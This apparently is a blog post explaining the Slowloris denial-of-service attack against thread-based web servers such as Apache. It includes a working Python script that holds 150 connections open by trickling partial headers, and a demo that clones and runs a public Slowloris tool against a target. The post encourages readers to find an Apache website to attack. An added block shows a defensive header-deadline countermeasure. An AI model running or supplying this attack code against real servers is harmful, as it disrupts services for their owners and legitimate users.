Slowloris ddos – All things in moderation


SLOWLORIS

About Slowloris

Developed by Robert “RSnake” Hansen, Slowloris is DDoS attack software that enables a single computer to take down a web server. It requires minimal bandwidth and affects only the target’s web server, with almost no side effects on other services and ports.

Attack description

The idea of Slowloris is simple. It targets servers that use thread pools (mainly Apache). That means that instead of trying to fill a server’s internet pipes, Slowloris makes it run out of threads. This makes the server unable to respond to legitimate users. Asynchronous/event-driven servers, such as nginx and Node.js, are not vulnerable to this.
That is why we are switching from Apache to nginx or others.

Slowloris works by opening multiple connections to the targeted web server and keeping them open as long as possible. Let’s see how a threaded server would actually respond to a client. First of all, the server accepts a connection. After this, it reads the request method, the path and all the headers. Only after reading all the headers does the server send a response and close the connection.

Slowloris exploits the fact that the server needs to read all the headers before replying to a client. It connects to the server and sends a request just like a normal user would; but instead of sending all the headers and completing the request, it keeps sending headers very slowly. This keeps the connection open and the thread handling it occupied, which means that thread can’t serve real users.
Here is how it looks in a simple form:

GET / HTTP/1.1
Host: target.com
User-Agent: Gecko
[waits 10 seconds]
X-test: 145
[waits 10 seconds]
X-test: 43
[waits 10 seconds]
X-test: 7
[waits 10 seconds]
...
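As an added example, not part of the original post or the linked tool, here is the server-side countermeasure that the description above points to: a worker that gives the whole request-header phase a single deadline, so a client trickling one header every ten seconds is dropped after a fixed time instead of occupying its thread for good. This is the same idea as Apache’s mod_reqtimeout and nginx’s client_header_timeout; the deadline value, the socketpair-based client and its header lines are constructed for the demonstration.

```python
import socket
import threading
import time

HEADER_DEADLINE = 0.5  # seconds allowed for the whole request-header phase (assumed)


def read_request_headers(conn, deadline=HEADER_DEADLINE):
    """Return the request head, or None if the blank line ending the headers
    has not arrived within `deadline`. The deadline spans the whole header
    phase, not each recv(), so trickled headers cannot hold the thread."""
    end = time.monotonic() + deadline
    buf = b""
    while b"\r\n\r\n" not in buf:
        remaining = end - time.monotonic()
        if remaining <= 0 or len(buf) > 8192:  # too slow or oversized head
            return None
        conn.settimeout(remaining)
        try:
            chunk = conn.recv(4096)
        except socket.timeout:
            return None
        if not chunk:  # peer closed before finishing the head
            return None
        buf += chunk
    return buf


def simulate(client_lines, gap, deadline=HEADER_DEADLINE):
    """Constructed client sending `client_lines` `gap` seconds apart; returns
    the worker's verdict and how long the worker thread was occupied."""
    server_side, client_side = socket.socketpair()

    def client():
        try:
            for line in client_lines:
                client_side.sendall(line)
                time.sleep(gap)
        except OSError:
            pass  # the server dropped us mid-stream
        finally:
            client_side.close()

    threading.Thread(target=client, daemon=True).start()
    start = time.monotonic()
    head = read_request_headers(server_side, deadline)
    server_side.close()  # either way the worker thread is free again
    return ("served" if head else "dropped"), time.monotonic() - start
```

A well-formed request completes within the deadline and is served; a client that sends only one header every 0.3 s is cut off at roughly 0.5 s, bounding how long one connection can tie up a thread.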

Python implementation

First of all, we will need to construct a list of socket connections:

import socket

socket_list = []
for i in range(150):
    s = socket.socket()
    s.connect(("example.com", 80))
    # sockets send bytes, so the header lines must be encoded
    s.send(b"GET / HTTP/1.1\r\n")
    s.send(b"Host: example.com\r\n")
    socket_list.append(s)

Next, we will set up a loop to send the headers:

import random
import time

while True:
    for s in socket_list:
        # one partial header per connection keeps the request incomplete
        header = "X-test: {}\r\n".format(random.randint(1, 5000))
        s.send(header.encode("utf-8"))
    time.sleep(10)

This is just a simple implementation; making it work in a real situation takes more than that. The source code below is available if you want more details.

Demo

Clone the source code from GitHub:

git clone https://github.com/gkbrk/slowloris.git  

You will first need to set up a Python environment and install the required packages.

Run with the default arguments:

python slowloris.py target.com  

Find a website that is using an Apache server, or set one up locally to test. I tested it and it works.
